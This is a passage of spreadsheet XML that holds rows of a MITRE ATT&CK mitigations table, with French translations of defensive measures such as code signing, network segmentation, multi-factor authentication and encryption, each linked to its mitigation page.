    <row r="17" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>2017</v>
      </c>
      <c r="B17" t="s">
        <v>444</v>
      </c>
      <c r="C17" t="s">
        <v>1977</v>
      </c>
      <c r="D17" t="s">
        <v>1971</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>2018</v>
      </c>
      <c r="F17" s="2" t="s">
        <v>2228</v>
      </c>
      <c r="G17" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Renforcez l’intégrité binaire et de l’application avec la vérification de la signature numérique pour empêcher l’exécution de code non fiable.
https://attack.mitre.org/mitigations/M1045</v>
      </c>
    </row>
    <row r="18" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>2019</v>
      </c>
      <c r="B18" t="s">
        <v>2020</v>
      </c>
      <c r="C18" t="s">
        <v>1977</v>
      </c>
      <c r="D18" t="s">
        <v>1971</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>2021</v>
      </c>
      <c r="F18" s="2" t="s">
        <v>2692</v>
      </c>
      <c r="G18" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez la modification des variables d’environnement par des utilisateurs et des groupes non autorisés.
https://attack.mitre.org/mitigations/M1039</v>
      </c>
    </row>
    <row r="19" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>2022</v>
      </c>
      <c r="B19" t="s">
        <v>2023</v>
      </c>
      <c r="C19" t="s">
        <v>1970</v>
      </c>
      <c r="D19" t="s">
        <v>1971</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>2693</v>
      </c>
      <c r="G19" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez une stratégie de prévention des pertes de données (DLP) pour catégoriser les données sensibles, identifier les formats de données indiquant des informations personnelles identifiables (PII) et limiter l’exfiltration de données sensibles. (Citation : Prévention des pertes de données PurpleSec)
https://attack.mitre.org/mitigations/M1057</v>
      </c>
    </row>
    <row r="20" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>2025</v>
      </c>
      <c r="B20" t="s">
        <v>2026</v>
      </c>
      <c r="C20" t="s">
        <v>1977</v>
      </c>
      <c r="D20" t="s">
        <v>1971</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>2027</v>
      </c>
      <c r="F20" s="2" t="s">
        <v>2694</v>
      </c>
      <c r="G20" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Protégez les processus avec des privilèges élevés qui peuvent être utilisés pour interagir avec des composants système critiques à l’aide d’un éclairage de processus protégé, de défenses anti-injection de processus ou d’autres mesures d’application de l’intégrité des processus.
https://attack.mitre.org/mitigations/M1025</v>
      </c>
    </row>
    <row r="21" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>2028</v>
      </c>
      <c r="B21" t="s">
        <v>2029</v>
      </c>
      <c r="C21" t="s">
        <v>1993</v>
      </c>
      <c r="D21" t="s">
        <v>1971</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>2030</v>
      </c>
      <c r="F21" s="2" t="s">
        <v>2695</v>
      </c>
      <c r="G21" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette catégorie consiste à associer des techniques dont l’atténuation pourrait augmenter le risque de compromission et, par conséquent, l’atténuation n’est pas recommandée.
https://attack.mitre.org/mitigations/M1055</v>
      </c>
    </row>
    <row r="22" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>2031</v>
      </c>
      <c r="B22" t="s">
        <v>2032</v>
      </c>
      <c r="C22" t="s">
        <v>1993</v>
      </c>
      <c r="D22" t="s">
        <v>1971</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>2033</v>
      </c>
      <c r="F22" s="2" t="s">
        <v>2696</v>
      </c>
      <c r="G22" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette catégorie est utilisée pour toutes les activités d’atténuation applicables qui s’appliquent aux techniques mises en œuvre avant qu’un adversaire n’obtienne l’accès initial, telles que les techniques de reconnaissance et de développement des ressources.
https://attack.mitre.org/mitigations/M1056</v>
      </c>
    </row>
    <row r="23" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>2034</v>
      </c>
      <c r="B23" t="s">
        <v>2035</v>
      </c>
      <c r="C23" t="s">
        <v>1977</v>
      </c>
      <c r="D23" t="s">
        <v>1971</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>2036</v>
      </c>
      <c r="F23" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="G23" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Interrompez et inspectez les sessions SSL/TLS pour rechercher des activités adverses dans le trafic Web chiffré.
https://attack.mitre.org/mitigations/M1020</v>
      </c>
    </row>
    <row r="24" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>2037</v>
      </c>
      <c r="B24" t="s">
        <v>2038</v>
      </c>
      <c r="C24" t="s">
        <v>1977</v>
      </c>
      <c r="D24" t="s">
        <v>1971</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>2039</v>
      </c>
      <c r="F24" s="2" t="s">
        <v>2697</v>
      </c>
      <c r="G24" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des méthodes sécurisées pour démarrer un système et vérifier l’intégrité du système d’exploitation et des mécanismes de chargement.
https://attack.mitre.org/mitigations/M1046</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>2040</v>
      </c>
      <c r="B25" t="s">
        <v>2041</v>
      </c>
      <c r="C25" t="s">
        <v>1977</v>
      </c>
      <c r="D25" t="s">
        <v>1971</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>2042</v>
      </c>
      <c r="F25" s="2" t="s">
        <v>2698</v>
      </c>
      <c r="G25" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Établissez des canaux de communication hors bande sécurisés pour assurer la continuité des communications critiques en cas d’incidents de sécurité, d’attaques d’intégrité des données ou de défaillances de communication au sein du réseau. La communication hors bande fait référence à l’utilisation d’un autre chemin de communication distinct qui ne dépend pas de l’infrastructure du réseau principal potentiellement compromise. Cette méthode peut inclure des applications de messagerie sécurisées, des lignes téléphoniques cryptées, des communications par satellite ou des systèmes de communication d’urgence dédiés. L’exploitation de ces canaux alternatifs réduit le risque que les adversaires interceptent, perturbent ou altèrent les communications sensibles et permet de coordonner une réponse efficace aux incidents. (Citation : TrustedSec OOB Communications)(Citation : Publication spéciale du NIST 800-53 Révision 5)
https://attack.mitre.org/mitigations/M1060</v>
      </c>
    </row>
    <row r="26" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>2043</v>
      </c>
      <c r="B26" t="s">
        <v>2044</v>
      </c>
      <c r="C26" t="s">
        <v>1977</v>
      </c>
      <c r="D26" t="s">
        <v>1971</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>2045</v>
      </c>
      <c r="F26" s="2" t="s">
        <v>2699</v>
      </c>
      <c r="G26" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Concevez des sections du réseau pour isoler les systèmes, les fonctions ou les ressources critiques. Utilisez la segmentation physique et logique pour empêcher l’accès à des systèmes et des informations potentiellement sensibles. Utilisez une DMZ pour contenir tous les services Internet qui ne doivent pas être exposés à partir du réseau interne. Configurez des instances de cloud privé virtuel (VPC) distinctes pour isoler les systèmes cloud critiques.
https://attack.mitre.org/mitigations/M1030</v>
      </c>
    </row>
    <row r="27" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>2046</v>
      </c>
      <c r="B27" t="s">
        <v>2047</v>
      </c>
      <c r="C27" t="s">
        <v>1977</v>
      </c>
      <c r="D27" t="s">
        <v>1971</v>
      </c>
      <c r="E27" s="2" t="s">
        <v>2048</v>
      </c>
      <c r="F27" s="2" t="s">
        <v>2700</v>
      </c>
      <c r="G27" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Un programme de renseignement sur les menaces aide une organisation à générer ses propres informations et à suivre les tendances afin d’établir les priorités défensives afin d’atténuer les risques.
https://attack.mitre.org/mitigations/M1019</v>
      </c>
    </row>
    <row r="28" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>2049</v>
      </c>
      <c r="B28" t="s">
        <v>2050</v>
      </c>
      <c r="C28" t="s">
        <v>1977</v>
      </c>
      <c r="D28" t="s">
        <v>1971</v>
      </c>
      <c r="E28" s="2" t="s">
        <v>2051</v>
      </c>
      <c r="F28" s="2" t="s">
        <v>2701</v>
      </c>
      <c r="G28" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Définissez et appliquez des politiques de mot de passe sécurisées pour les comptes.
https://attack.mitre.org/mitigations/M1027</v>
      </c>
    </row>
    <row r="29" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>2052</v>
      </c>
      <c r="B29" t="s">
        <v>2053</v>
      </c>
      <c r="C29" t="s">
        <v>1970</v>
      </c>
      <c r="D29" t="s">
        <v>1971</v>
      </c>
      <c r="E29" s="2" t="s">
        <v>2054</v>
      </c>
      <c r="F29" s="2" t="s">
        <v>2702</v>
      </c>
      <c r="G29" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez les fonctionnalités pour empêcher les comportements suspects de se produire sur les systèmes de terminaux. Il peut s’agir d’un processus suspect, d’un fichier, d’un appel d’API, etc.
https://attack.mitre.org/mitigations/M1040</v>
      </c>
    </row>
    <row r="30" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>2055</v>
      </c>
      <c r="B30" t="s">
        <v>2056</v>
      </c>
      <c r="C30" t="s">
        <v>1977</v>
      </c>
      <c r="D30" t="s">
        <v>1971</v>
      </c>
      <c r="E30" s="2" t="s">
        <v>2057</v>
      </c>
      <c r="F30" s="2" t="s">
        <v>2703</v>
      </c>
      <c r="G30" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Gérez la création, la modification, l’utilisation et les autorisations associées aux comptes utilisateurs.
https://attack.mitre.org/mitigations/M1018</v>
      </c>
    </row>
    <row r="31" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>2058</v>
      </c>
      <c r="B31" t="s">
        <v>2059</v>
      </c>
      <c r="C31" t="s">
        <v>1977</v>
      </c>
      <c r="D31" t="s">
        <v>1971</v>
      </c>
      <c r="E31" s="2" t="s">
        <v>2060</v>
      </c>
      <c r="F31" s="2" t="s">
        <v>2704</v>
      </c>
      <c r="G31" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Limitez l’accès en définissant des autorisations de répertoire et de fichier qui ne sont pas spécifiques aux utilisateurs ou aux comptes privilégiés.
https://attack.mitre.org/mitigations/M1022</v>
      </c>
    </row>
    <row r="32" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>2061</v>
      </c>
      <c r="B32" t="s">
        <v>2062</v>
      </c>
      <c r="C32" t="s">
        <v>1977</v>
      </c>
      <c r="D32" t="s">
        <v>1971</v>
      </c>
      <c r="E32" s="2" t="s">
        <v>2063</v>
      </c>
      <c r="F32" s="2" t="s">
        <v>2705</v>
      </c>
      <c r="G32" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Gérez la création, la modification, l’utilisation et les autorisations associées aux comptes privilégiés, y compris SYSTEM et root.
https://attack.mitre.org/mitigations/M1026</v>
      </c>
    </row>
    <row r="33" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>2064</v>
      </c>
      <c r="B33" t="s">
        <v>2065</v>
      </c>
      <c r="C33" t="s">
        <v>1977</v>
      </c>
      <c r="D33" t="s">
        <v>1971</v>
      </c>
      <c r="E33" s="2" t="s">
        <v>2066</v>
      </c>
      <c r="F33" s="2" t="s">
        <v>2706</v>
      </c>
      <c r="G33" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Restreindre la possibilité de modifier certaines ruches ou clés dans le registre Windows.
https://attack.mitre.org/mitigations/M1024</v>
      </c>
    </row>
    <row r="34" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>2067</v>
      </c>
      <c r="B34" t="s">
        <v>2068</v>
      </c>
      <c r="C34" t="s">
        <v>1970</v>
      </c>
      <c r="D34" t="s">
        <v>1971</v>
      </c>
      <c r="E34" s="2" t="s">
        <v>2069</v>
      </c>
      <c r="F34" s="2" t="s">
        <v>2068</v>
      </c>
      <c r="G34" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des signatures ou des heuristiques pour détecter les logiciels malveillants.
https://attack.mitre.org/mitigations/M1049</v>
      </c>
    </row>
    <row r="35" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>2070</v>
      </c>
      <c r="B35" t="s">
        <v>2071</v>
      </c>
      <c r="C35" t="s">
        <v>1977</v>
      </c>
      <c r="D35" t="s">
        <v>1971</v>
      </c>
      <c r="E35" s="2" t="s">
        <v>2072</v>
      </c>
      <c r="F35" s="2" t="s">
        <v>2707</v>
      </c>
      <c r="G35" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utiliser deux preuves ou plus pour s’authentifier auprès d’un système ; tels que le nom d’utilisateur et le mot de passe en plus d’un jeton provenant d’une carte à puce physique ou d’un générateur de jetons.
https://attack.mitre.org/mitigations/M1032</v>
      </c>
    </row>
    <row r="36" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>2073</v>
      </c>
      <c r="B36" t="s">
        <v>2074</v>
      </c>
      <c r="C36" t="s">
        <v>1977</v>
      </c>
      <c r="D36" t="s">
        <v>1971</v>
      </c>
      <c r="E36" s="2" t="s">
        <v>2075</v>
      </c>
      <c r="F36" s="2" t="s">
        <v>2708</v>
      </c>
      <c r="G36" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Mettre en œuvre des modifications de configuration du logiciel (autre que le système d’exploitation) pour atténuer les risques de sécurité associés au fonctionnement du logiciel.
https://attack.mitre.org/mitigations/M1054</v>
      </c>
    </row>
    <row r="37" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>2076</v>
      </c>
      <c r="B37" t="s">
        <v>2077</v>
      </c>
      <c r="C37" t="s">
        <v>1977</v>
      </c>
      <c r="D37" t="s">
        <v>1971</v>
      </c>
      <c r="E37" s="2" t="s">
        <v>2078</v>
      </c>
      <c r="F37" s="2" t="s">
        <v>2709</v>
      </c>
      <c r="G37" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Limitez l’exécution de code à un environnement virtuel sur ou en transit vers un système de point de terminaison.
https://attack.mitre.org/mitigations/M1048</v>
      </c>
    </row>
    <row r="38" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>2079</v>
      </c>
      <c r="B38" t="s">
        <v>2080</v>
      </c>
      <c r="C38" t="s">
        <v>1977</v>
      </c>
      <c r="D38" t="s">
        <v>1971</v>
      </c>
      <c r="E38" s="2" t="s">
        <v>2081</v>
      </c>
      <c r="F38" s="2" t="s">
        <v>2080</v>
      </c>
      <c r="G38" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuer des audits ou des analyses des systèmes, des autorisations, des logiciels non sécurisés, des configurations non sécurisées, etc. pour identifier les faiblesses potentielles.
https://attack.mitre.org/mitigations/M1047</v>
      </c>
    </row>
    <row r="39" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>2082</v>
      </c>
      <c r="B39" t="s">
        <v>2083</v>
      </c>
      <c r="C39" t="s">
        <v>1970</v>
      </c>
      <c r="D39" t="s">
        <v>1971</v>
      </c>
      <c r="E39" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="F39" s="2" t="s">
        <v>2710</v>
      </c>
      <c r="G39" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez les capacités pour détecter et bloquer les conditions qui peuvent conduire à ou être indicatives d’un exploit logiciel.
https://attack.mitre.org/mitigations/M1050</v>
      </c>
    </row>
    <row r="40" spans="1:7" ht="144" x14ac:dyDescent="0.3">
      <c r="A40" t="s">
        <v>2085</v>
      </c>
      <c r="B40" t="s">
        <v>2086</v>
      </c>
      <c r="C40" t="s">
        <v>1977</v>
      </c>
      <c r="D40" t="s">
        <v>1971</v>
      </c>
      <c r="E40" s="2" t="s">
        <v>2087</v>
      </c>
      <c r="F40" s="2" t="s">
        <v>2711</v>
      </c>
      <c r="G40" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Mettez en œuvre des configurations Active Directory robustes à l’aide de stratégies de groupe pour contrôler l’accès et réduire la surface d’attaque. En voici quelques exemples précis :
* Configuration du compte : utilisez des comptes de domaine provisionnés plutôt que des comptes locaux pour tirer parti des capacités de contrôle et d’audit centralisées.
* Restrictions d’ouverture de session interactive : appliquez des stratégies de groupe qui interdisent les ouvertures de session interactives pour les comptes qui ne doivent pas accéder directement aux systèmes.
* Paramètres du bureau à distance : Limitez les connexions au bureau à distance aux comptes autorisés afin d’éviter toute utilisation abusive par des adversaires.
* Comptes administratifs dédiés : créez des comptes spécialisés à l’échelle du domaine qui sont limités aux ouvertures de session interactives, mais qui peuvent effectuer des tâches spécifiques telles que les installations ou l’accès au référentiel.
* Silos d’authentification : configurez les silos d’authentification dans Active Directory pour créer des zones d’accès avec des restrictions basées sur l’appartenance au groupe de sécurité global Utilisateurs protégés. Cette configuration renforce la sécurité en appliquant des protections supplémentaires aux comptes à haut risque, limitant ainsi leur exposition aux attaques potentielles.
https://attack.mitre.org/mitigations/M1015</v>
      </c>
    </row>
    <row r="41" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A41" t="s">
        <v>2088</v>
      </c>
      <c r="B41" t="s">
        <v>2089</v>
      </c>
      <c r="C41" t="s">
        <v>1977</v>
      </c>
      <c r="D41" t="s">
        <v>1971</v>
      </c>
      <c r="E41" s="2" t="s">
        <v>2090</v>
      </c>
      <c r="F41" s="2" t="s">
        <v>2712</v>
      </c>
      <c r="G41" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuez régulièrement des mises à jour logicielles pour atténuer le risque d’exploitation.
https://attack.mitre.org/mitigations/M1051</v>
      </c>
    </row>
    <row r="42" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A42" t="s">
        <v>2091</v>
      </c>
      <c r="B42" t="s">
        <v>2092</v>
      </c>
      <c r="C42" t="s">
        <v>1977</v>
      </c>
      <c r="D42" t="s">
        <v>1971</v>
      </c>
      <c r="E42" s="2" t="s">
        <v>2093</v>
      </c>
      <c r="F42" s="2" t="s">
        <v>2713</v>
      </c>
      <c r="G42" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez l’utilisation abusive des mécanismes de chargement de bibliothèque dans le système d’exploitation et les logiciels pour charger du code non fiable en configurant des mécanismes de chargement de bibliothèque appropriés et en examinant les logiciels potentiellement vulnérables.
https://attack.mitre.org/mitigations/M1044</v>
      </c>
    </row>
    <row r="43" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A43" t="s">
        <v>2094</v>
      </c>
      <c r="B43" t="s">
        <v>2095</v>
      </c>
      <c r="C43" t="s">
        <v>1977</v>
      </c>
      <c r="D43" t="s">
        <v>1971</v>
      </c>
      <c r="E43" s="2" t="s">
        <v>2096</v>
      </c>
      <c r="F43" s="2" t="s">
        <v>2714</v>
      </c>
      <c r="G43" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Supprimez ou refusez l’accès aux logiciels inutiles et potentiellement vulnérables afin d’éviter les abus par des adversaires.
https://attack.mitre.org/mitigations/M1042</v>
      </c>
    </row>
    <row r="44" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A44" t="s">
        <v>2097</v>
      </c>
      <c r="B44" t="s">
        <v>2098</v>
      </c>
      <c r="C44" t="s">
        <v>1977</v>
      </c>
      <c r="D44" t="s">
        <v>1971</v>
      </c>
      <c r="E44" s="2" t="s">
        <v>2099</v>
      </c>
      <c r="F44" s="2" t="s">
        <v>2715</v>
      </c>
      <c r="G44" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Configurez les fonctionnalités liées à l’utilisation du compte, telles que les verrouillages de tentatives de connexion, les heures de connexion spécifiques, etc.
https://attack.mitre.org/mitigations/M1036</v>
      </c>
    </row>
    <row r="45" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A45" t="s">
        <v>2100</v>
      </c>
      <c r="B45" t="s">
        <v>2101</v>
      </c>
      <c r="C45" t="s">
        <v>1977</v>
      </c>
      <c r="D45" t="s">
        <v>1971</v>
      </c>
      <c r="E45" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="F45" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="G45" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Protégez les informations sensibles grâce à un cryptage fort.
https://attack.mitre.org/mitigations/M1041</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="2" type="noConversion"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <ignoredErrors>
    <ignoredError sqref="F2:F45"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library_meta</vt:lpstr>
      <vt:lpstr>Mitre threats_meta</vt:lpstr>
      <vt:lpstr>Mitre threats_content</vt:lpstr>
      <vt:lpstr>Mitre mitigations_meta</vt:lpstr>
      <vt:lpstr>Mitre mitigations_content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2025-07-04T13:51:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T15:41:58Z</dcterms:modified>
</cp:coreProperties>
</file>